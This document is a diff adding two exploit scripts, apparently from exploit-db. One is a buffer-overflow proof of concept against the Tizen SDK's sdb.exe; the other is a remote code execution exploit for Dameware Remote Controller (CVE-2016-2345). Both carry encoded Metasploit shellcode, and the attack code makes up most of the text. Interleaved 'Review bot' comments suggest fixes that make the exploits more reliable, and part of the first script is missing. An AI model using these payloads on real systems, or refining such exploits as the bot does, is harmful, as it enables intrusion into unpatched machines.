issue to Tizen Mobile project +# - NO RESPONSE - +# 7/Sep/16 - Escalated through Samsung security contact (BZ) +# 14/Nov/16 - Got informed by BZ that HQ is dealing with the issue with no further details +# - NO RESPONSE - +# 02/Oct/17 - Tizen Mobile project has been informed about plans to release PoC on exploit-db +# - NO RESPONSE - +# 22/Oct/17 - The PoC submitted to exploit-db + + +import struct +import subprocess +import sys + +ARGS = " launch A A A A A " + + +def tech_direct_exec(sdb_path): + # msfvenom -a x86 --platform Windows -p windows/exec CMD=calc -e x86/shikata_ga_nai \ + # -b '\x00\x20\x0a\x0d\x1b\x0b\x0c' -f python + buf = "" + buf += "\xb8\xb6\x98\xe6\xfa\xdb\xcb\xd9\x74\x24\xf4\x5b\x31" + buf += "\xc9\xb1\x30\x31\x43\x13\x83\xeb\xfc\x03\x43\xb9\x7a" + buf += 
"\x13\x06\x2d\xf8\xdc\xf7\xad\x9d\x55\x12\x9c\x9d\x02" + buf += "\x56\x8e\x2d\x40\x3a\x22\xc5\x04\xaf\xb1\xab\x80\xc0" + buf += "\x72\x01\xf7\xef\x83\x3a\xcb\x6e\x07\x41\x18\x51\x36" + buf += "\x8a\x6d\x90\x7f\xf7\x9c\xc0\x28\x73\x32\xf5\x5d\xc9" + buf += "\x8f\x7e\x2d\xdf\x97\x63\xe5\xde\xb6\x35\x7e\xb9\x18" + buf += "\xb7\x53\xb1\x10\xaf\xb0\xfc\xeb\x44\x02\x8a\xed\x8c" + buf += "\x5b\x73\x41\xf1\x54\x86\x9b\x35\x52\x79\xee\x4f\xa1" + buf += "\x04\xe9\x8b\xd8\xd2\x7c\x08\x7a\x90\x27\xf4\x7b\x75" + buf += "\xb1\x7f\x77\x32\xb5\xd8\x9b\xc5\x1a\x53\xa7\x4e\x9d" + buf += "\xb4\x2e\x14\xba\x10\x6b\xce\xa3\x01\xd1\xa1\xdc\x52" + buf += "\xba\x1e\x79\x18\x56\x4a\xf0\x43\x3c\x8d\x86\xf9\x72" + buf += "\x8d\x98\x01\x22\xe6\xa9\x8a\xad\x71\x36\x59\x8a\x8e" + buf += "\x7c\xc0\xba\x06\xd9\x90\xff\x4a\xda\x4e\xc3\x72\x59" + buf += "\x7b\xbb\x80\x41\x0e\xbe\xcd\xc5\xe2\xb2\x5e\xa0\x04" + buf += "\x61\x5e\xe1\x66\xe4\xcc\x69\x69" + + stack_adj = "\x83\xEC\x7F" * 2 # SUB ESP,0x7F - stack adjustment + sc = stack_adj + buf + + eip = "\x01\xed\x8b" # 008BED01 - 3 byte EIP overwrite + payload = "B" * 2000 + "\x90" * (2086 - len(sc) - 1) + "\x90" + sc + eip + + print "Trying to exploit the binary... " + print "Payload length: " + str(len(payload)) + print sdb_path + ARGS + payload + + subprocess.Popen([sdb_path, "launch", "A", "A", "A", "A", "A", payload], stdout=subprocess.PIPE) + + +def tech_social_ascii(sdb_path, jmp_esp_addr): + eip = struct.pack(' + +Demonstrated Exploitation Techniques: +1: Direct execution, 3-byte EIP overwrite, Stack adjustment +2: Payload for social engineering attack, JMP ESP (!mona find -s "\\xff\\xe4" -cp alphanum), Alphanumeric shellcode +3: Bonus exercise - source code analysis + +This code has been created for educational purposes only, to raise awareness on software security, and it's harmless +by intention (the PoC runs calc.exe). 
Please do not change the code behaviour to malicious + +Usage: python sdbBOpoc.py [Technique_ID] [Path_to_sdb.exe] [Address_of_JMP_ESP] +Examples: python sdbBOpoc.py 1 C:\Tizen\Tools\sdb.exe + python sdbBOpoc.py 2 C:\Tizen\Tools\sdb.exe 0x76476557 + python sdbBOpoc.py 3""" + + +def main(): + if len(sys.argv) > 1: + if int(sys.argv[1]) == 1: + if len(sys.argv) == 3: + tech_direct_exec(sys.argv[2]) + if int(sys.argv[1]) == 2: + if len(sys.argv) == 4: + tech_social_ascii(sys.argv[2], sys.argv[3]) + if int(sys.argv[1]) == 3: + bonus_exercise() + else: + usage() + + +if __name__ == '__main__': + main() diff --git a/platforms/windows/remote/43059.py b/platforms/windows/remote/43059.py new file mode 100755 index 000000000..d23f4cbb9 --- /dev/null +++ b/platforms/windows/remote/43059.py 
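Review bot: `main()` only falls back to `usage()` from the `== 3` branch, so technique `1` without a path or technique `2` without the address exits silently, and a non-numeric first argument raises `ValueError` from `int(sys.argv[1])` before any check runs; an `elif` chain with the argument-count folded into each condition sends every malformed invocation to `usage()`. As rendered here the file loses everything between `struct.pack('` in `tech_social_ascii` and `Demonstrated Exploitation Techniques:` — presumably the `'<I'` format string and the rest of that function, `bonus_exercise` and the start of `usage` were swallowed as an HTML tag — so that region of the committed 176-line file should be verified against the repository rather than this view. `subprocess.Popen(..., stdout=subprocess.PIPE)` in `tech_direct_exec` is never read or waited on, so the child can block on a full pipe; `subprocess.call` or a `communicate()` call would avoid that.
```python
def main():
    if len(sys.argv) < 2 or not sys.argv[1].isdigit():
        usage()
        return
    technique = int(sys.argv[1])
    if technique == 1 and len(sys.argv) == 3:
        tech_direct_exec(sys.argv[2])
    elif technique == 2 and len(sys.argv) == 4:
        tech_social_ascii(sys.argv[2], sys.argv[3])
    elif technique == 3:
        bonus_exercise()
    else:
        usage()
```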
@@ -0,0 +1,79 @@ +# Exploit Title: Dameware Remote Controller RCE +# Date: 3-04-2016 +# Exploit Author: Securifera +# Vendor Homepage: http://www.dameware.com/products/mini-remote-control/product-overview.aspx +# Version: 12.0.0.520 +# Website: https://www.securifera.com/blog/2016/04/03/fun-with-remote-controllers-dameware-mini-remote-control-cve-2016-2345/ +# CVE : CVE-2016-2345 + +import socket +import sys +import os +import time +import struct +import binascii +import random + +# windows/exec - 220 bytes +# http://www.metasploit.com +# Encoder: x86/shikata_ga_nai +# VERBOSE=false, PrependMigrate=false, EXITFUNC=process, +# CMD=calc.exe +sc = "" +sc += "\xba\x01\xa8\x4f\x9e\xd9\xca\xd9\x74\x24\xf4\x5e\x29" +sc += "\xc9\xb1\x31\x31\x56\x13\x03\x56\x13\x83\xee\xfd\x4a" +sc += "\xba\x62\x15\x08\x45\x9b\xe5\x6d\xcf\x7e\xd4\xad\xab" +sc += "\x0b\x46\x1e\xbf\x5e\x6a\xd5\xed\x4a\xf9\x9b\x39\x7c" +sc += "\x4a\x11\x1c\xb3\x4b\x0a\x5c\xd2\xcf\x51\xb1\x34\xee" +sc += "\x99\xc4\x35\x37\xc7\x25\x67\xe0\x83\x98\x98\x85\xde" +sc += "\x20\x12\xd5\xcf\x20\xc7\xad\xee\x01\x56\xa6\xa8\x81" +sc += "\x58\x6b\xc1\x8b\x42\x68\xec\x42\xf8\x5a\x9a\x54\x28" +sc += "\x93\x63\xfa\x15\x1c\x96\x02\x51\x9a\x49\x71\xab\xd9" +sc += "\xf4\x82\x68\xa0\x22\x06\x6b\x02\xa0\xb0\x57\xb3\x65" +sc += "\x26\x13\xbf\xc2\x2c\x7b\xa3\xd5\xe1\xf7\xdf\x5e\x04" +sc += "\xd8\x56\x24\x23\xfc\x33\xfe\x4a\xa5\x99\x51\x72\xb5" +sc += "\x42\x0d\xd6\xbd\x6e\x5a\x6b\x9c\xe4\x9d\xf9\x9a\x4a" +sc += "\x9d\x01\xa5\xfa\xf6\x30\x2e\x95\x81\xcc\xe5\xd2\x7e" +sc += "\x87\xa4\x72\x17\x4e\x3d\xc7\x7a\x71\xeb\x0b\x83\xf2" +sc += "\x1e\xf3\x70\xea\x6a\xf6\x3d\xac\x87\x8a\x2e\x59\xa8" +sc += "\x39\x4e\x48\xcb\xdc\xdc\x10\x22\x7b\x65\xb2\x3a" + +port = 6129 + +if len (sys.argv) == 2: + (progname, host ) = sys.argv +else: + print len (sys.argv) + print 'Usage: {0} host'.format (sys.argv[0]) + exit (1) + +csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) +csock.connect ( (host, int(port)) ) + +type = 444.0 +buf = 
struct.pack("I", 4400 ) #Init Version +buf += "\xcc"*4 +buf += struct.pack("d", type) #Minor Version +buf += struct.pack("d", type) #Minor Version +buf += (40 - len(buf)) * "C" +csock.send(buf) + +wstr = "\x90" * 0x10 #nop sled +wstr += sc #calc shellcode +wstr += "\x90" * (0x2ac - 0x10 - len(sc)) +wstr += "\xeb\x06\xff\xff" #short jump forward +wstr += struct.pack("I", 0x00401161 ) #pop pop return gadget +wstr += "\x90" * 3 #nop +wstr += "\xe9\x6b\xfa\xff\xff" #short jump back to shellcode +wstr += "E" * 0xbc +wstr += ("%" + "\x00" + "c" + "\x00")*5 + +buf = struct.pack("I", 0x9c44) #msg type +buf += wstr #payload +buf += "\x00" * (0x200) #null bytes +csock.send(buf) + +print binascii.hexlify(csock.recv(0x4000)) #necessary reads +print binascii.hexlify(csock.recv(0x4000)) + +csock.close()
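Review bot: The socket has no timeout, so `csock.recv(0x4000)` blocks indefinitely if the service drops the connection without replying or never answers, and `csock.close()` is not reached on any exception; `csock.settimeout(10)` right after the socket is created and a `try/finally` around the two sends and reads would make the script terminate cleanly either way. `type = 444.0` shadows the builtin, and `os`, `time` and `random` are imported but unused. `struct.pack("I", ...)` uses native byte order and alignment; `"<I"` states the little-endian layout explicitly and is the same bytes on x86, which matters if the script is ever run from a non-x86 host. The hunk appears to end at `csock.close()`, the last line visible here.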